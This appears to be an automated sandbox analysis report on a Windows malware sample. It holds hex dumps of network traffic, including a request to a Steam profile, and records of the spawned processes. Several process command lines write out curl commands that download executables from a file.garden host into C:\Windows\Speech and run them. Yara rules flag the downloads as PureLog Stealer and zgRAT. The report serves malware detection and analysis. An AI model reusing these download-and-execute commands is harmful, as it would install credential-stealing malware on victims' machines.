                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: a6 cf c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5
                                                                                                                                                                      Data Ascii: 2[5CX",_:k$J48Q3e,|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: 73 de f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87
                                                                                                                                                                      Data Ascii: s}> :?mQEB_|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~c
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: db 13 c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da
                                                                                                                                                                      Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: 95 ba 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d
                                                                                                                                                                      Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: ae 9b 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95
                                                                                                                                                                      Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: 77 3c 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f
                                                                                                                                                                      Data Ascii: w<gxJfS{~ZsN\pVw`d[rcEDb=B|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA|yUsmje|\<_td $}d4Nl6*fc_
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: c6 39 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3
                                                                                                                                                                      Data Ascii: 9A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<*:eyy}VTZZ=,$Gz*\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~e
                                                                                                                                                                      2024-09-30 16:19:14 UTC1369INData Raw: 88 2f e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05
                                                                                                                                                                      Data Ascii: /.h!L3y8s6}*.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</|L|[2}cr"DeN)vv_eH*4jnm$WS_k5c:TiNSRjX*'TD|K{3


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.849710104.102.49.2544433724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-09-30 16:19:17 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                      2024-09-30 16:19:18 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Date: Mon, 30 Sep 2024 16:19:18 GMT
                                                                                                                                                                      Content-Length: 25330
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: sessionid=073c0f50b0055e8b4643c583; Path=/; Secure; SameSite=None
                                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                      2024-09-30 16:19:18 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                      2024-09-30 16:19:18 UTC10816INData Raw: 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 62 75 6c 67 61 72 69 61 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 62 75 6c 67 61 72 69 61 6e 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e d0 91 d1 8a d0 bb d0 b3 d0 b0 d1 80 d1 81 d0 ba d0 b8 20 28 42 75 6c 67 61 72 69 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 63 7a 65 63 68 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 63 7a 65 63 68 27 20 29 3b 20 72 65 74
                                                                                                                                                                      Data Ascii: ss="popup_menu_item tight" href="?l=bulgarian" onclick="ChangeLanguage( 'bulgarian' ); return false;"> (Bulgarian)</a><a class="popup_menu_item tight" href="?l=czech" onclick="ChangeLanguage( 'czech' ); ret


                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:12:19:07
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\seoI30IZZr.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\seoI30IZZr.exe"
                                                                                                                                                                      Imagebase:0x7ff7865e0000
                                                                                                                                                                      File size:637'952 bytes
                                                                                                                                                                      MD5 hash:D0E53E2A0BEF6C93E0CCAD47A650079D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:12:19:07
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:12:19:09
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:12:19:09
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      Imagebase:0x7ff72b520000
                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:12:19:12
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\Speech\kdmapper.exe"
                                                                                                                                                                      Imagebase:0x600000
                                                                                                                                                                      File size:2'284'739 bytes
                                                                                                                                                                      MD5 hash:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:12:19:12
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                      Imagebase:0x7ff6aade0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:12:19:12
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                      Imagebase:0x7ff72b520000
                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:12:19:13
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                                                                                                                                                      Imagebase:0x840000
                                                                                                                                                                      File size:147'456 bytes
                                                                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:12:19:14
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\Speech\physmeme.exe"
                                                                                                                                                                      Imagebase:0xb10000
                                                                                                                                                                      File size:370'176 bytes
                                                                                                                                                                      MD5 hash:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 61%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:12:19:14
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:12:19:15
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                      Imagebase:0x2f0000
                                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:12:19:15
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                      Imagebase:0xce0000
                                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:12:19:28
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:12:19:28
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:12:19:28
                                                                                                                                                                      Start date:30/09/2024
                                                                                                                                                                      Path:C:\Edge\msedge.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Edge/msedge.exe"
                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                      File size:1'963'008 bytes
                                                                                                                                                                      MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
